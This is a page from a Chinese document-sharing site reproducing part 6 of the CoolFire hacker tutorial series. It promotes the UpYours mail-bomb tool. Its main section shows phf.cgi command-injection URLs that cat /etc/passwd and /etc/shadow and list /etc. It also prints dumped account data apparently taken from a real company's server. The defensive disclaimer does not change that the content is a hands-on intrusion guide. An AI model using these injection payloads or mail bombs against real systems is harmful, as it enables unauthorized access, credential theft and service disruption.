coolfire 黑客入门8篇(6)

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

coolfire黑客入门教程系列之(六)

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果

你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写

这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件

导致恶意入侵别人的电脑或网路, 本人概不负责!!

在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新

朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前

我还没有找到.... 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话,

欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档

案放在国内Server 中, 我想, 由HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人

的位址在.edu.tw 附近的, 欢迎来信要求Mirror~~ 我很乐意将档案Mirror 给你, 让其它网

友更方便取这些档案.

好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於Hacker 方面的问题, 也收到了许多

的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么

是shadow password 的, 请各位多翻翻以前的文章吧!! 在CGI Holes 方面的问题也很多, 所以在

这一篇之後我会找个时间写一写System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基

本的认识.

最近有许多软体更新了, 最令我们注意的当然就是NT 4.0 罗, 因为它的更新肯定会带来很多的

人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的Bugs 找出来的啦!!

UpYours 这套重量级的MailBomb 也出现的新的版本, 这次的V4.0 Beta 2 经试用後发现实在是

改进了很多, 但是相对的危险性也跟著提高, 其改用Delphi 来设计, 使得安装更为方便, 不过

美中不足的是beta2 的版本有些功能尚未改好, 光看到功能就让人哈翻了~~:) 这套beta2 的版

本目前在我们的首页上可以找得到, 相信它的正式版本很快就会完成~~

关於MailBomb: 我们的首页上所提供的MailBomb 仅供大家作为测试用, 请勿拿来开玩笑或是对别人

的信箱进行轰炸, 日前此类事件造成某些的ISP 当机, 慎至还有导致Mail Server 记忆体不足的情

况(哪个人这么狠??), 我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾

信件. 请大家以学习的心来使用这些Bombs... 不要没事就拿来炸人好吗?? Then enjoy new one~ 中国网管联盟www、bitsCN、com

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- [CGI Hole (phf.cgi) 的延伸]

这次的主题想了好久, 一直都没有想到, 不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨

及漏X的风波之後, 在他们的主机上发现了很好玩的状况, 原本我们在使用phf.cgi 来抓/etc/passwd

的时候, 在Browser 的Location 中是下:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

root:x:0:1:0000-Admin(0000):/:/sbin/sh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nadm:x:45:2::/usr/bin:/sbin/sh

iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript

news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh

ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false

hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh

dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh

ming:x:133:1::/home1/ming:/usr/bin/ksh

charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh

iiimail:x:142:6::/home/iiimail:/usr/lib/rsh

charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh

webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh

mark:x:171:1::/home1/mark:/usr/lib/rsh

jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh

ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh

但是如果没有, 或是shadow 的话, 你可能会接著试:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow

但是有时候虽然phf.cgi 这个程式的漏洞没有被补上, 还是有很多的机器不理会这个指令, 不过当这中国网管论坛

个指令生效, 但是你看到的却是一个shadow 过的passwd 的时候, 请不要灰心, 因为这台机器已经在

你的手中了, 为甚么呢?? 我们来玩看看一些简单的Unix shell command 你就会知道了~~ /cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc

total 466

-rw-r--r-- 1 root root 38 May 2 1996 #etcnamed.boot#

-rw-r--r-- 1 root root 20579 May 1 1996 #sendmail.cf#

drwxr-xr-x 11 root root 2048 Apr 17 13:07 .

drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..

-rw-r--r-- 1 root root 2167 Aug 24 1995 DIR_COLORS

-rw-r--r-- 1 root root 15 May 1 1996 HOSTNAME

-rw-r--r-- 1 root root 4 Feb 24 1993 NETWORKING

-rw-r--r-- 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN

-rw-r--r-- 1 root root 0 May 13 1994 at.deny

drwxr-xr-x 2 root root 1024 Apr 11 1996 backups

相关文档
最新文档